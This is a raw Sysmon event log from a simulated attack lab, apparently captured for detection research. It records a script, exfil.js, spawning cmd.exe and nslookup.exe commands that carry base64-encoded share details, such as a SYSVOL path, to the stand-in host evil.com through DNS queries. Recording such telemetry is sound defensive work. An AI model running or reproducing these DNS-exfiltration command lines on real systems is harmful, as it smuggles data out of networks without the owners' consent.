10341000x8000000000000000194385Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.767{2E1864BB-17A1-629A-783D-000000005F02}55524992C:\Windows\System32\WScript.exe{2E1864BB-17A6-629A-C73D-000000005F02}2848C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000194384Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.771{2E1864BB-17A6-629A-C73D-000000005F02}2848C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlngofzem.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000194383Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.767{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlccw.tmpMD5=D9DF221F6D351CB50A3CBB01BFD8B97F,SHA256=8D9029C9E209585AD6E7701BC4A411971A01D3D7E0C67FCA5DA104D2C7FD6185,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000194382Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.735{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=58C9DDEF8E50DA0AB0C4F3B22727A658,SHA256=4D926F21EB72F112AC7021ED0D87AF1DD495945C366164D014040DC331F49E54,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000194381Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.735{2E1864BB-17A6-629A-C53D-000000005F02}54728028C:\Windows\system32\conhost.exe{2E1864BB-17A6-629A-C63D-000000005F02}2060C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194380Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.735{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194379Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.735{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194378Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.735{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194377Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.735{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194376Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.735{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17A6-629A-C63D-000000005F02}2060C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000194375Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.720{2E1864BB-17A6-629A-C43D-000000005F02}76087508C:\Windows\system32\cmd.exe{2E1864BB-17A6-629A-C63D-000000005F02}2060C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000194374Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.735{2E1864BB-17A6-629A-C63D-000000005F02}2060C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBMb2dvbiBzZXJ2ZXIgc2hhcmUg evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17A6-629A-C43D-000000005F02}7608C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBMb2dvbiBzZXJ2ZXIgc2hhcmUg evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlccw.tmp 2>&1 10341000x8000000000000000194373Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.704{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17A6-629A-C53D-000000005F02}5472C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194372Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.704{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17A6-629A-C53D-000000005F02}5472C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194371Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.704{2E1864BB-17A6-629A-C53D-000000005F02}54728028C:\Windows\system32\conhost.exe{2E1864BB-17A6-629A-C43D-000000005F02}7608C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194370Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.682{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17A6-629A-C53D-000000005F02}5472C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000194369Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.682{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194368Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.682{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194367Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.682{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194366Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.682{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194365Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.682{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17A6-629A-C43D-000000005F02}7608C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000194364Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.682{2E1864BB-17A1-629A-783D-000000005F02}55521524C:\Windows\System32\WScript.exe{2E1864BB-17A6-629A-C43D-000000005F02}7608C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000194363Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.690{2E1864BB-17A6-629A-C43D-000000005F02}7608C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBMb2dvbiBzZXJ2ZXIgc2hhcmUg evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlccw.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000194362Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.682{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nljrods.tmpMD5=FFC3044AFB570E80F372BF53DBBB8207,SHA256=F6E14FFAF6210075EB5936267DAFDA62885E6C7751665C0CB6BEB4993231BC98,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000194361Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.636{2E1864BB-17A6-629A-C23D-000000005F02}57726560C:\Windows\system32\conhost.exe{2E1864BB-17A6-629A-C33D-000000005F02}2032C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194360Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.620{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194359Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.620{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194358Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.620{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194357Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.620{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194356Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.620{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17A6-629A-C33D-000000005F02}2032C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000194355Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.620{2E1864BB-17A6-629A-C13D-000000005F02}33965568C:\Windows\system32\cmd.exe{2E1864BB-17A6-629A-C33D-000000005F02}2032C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000194354Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.628{2E1864BB-17A6-629A-C33D-000000005F02}2032C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dzXFNZU1ZPTFxzeXN2b2w= evil.com 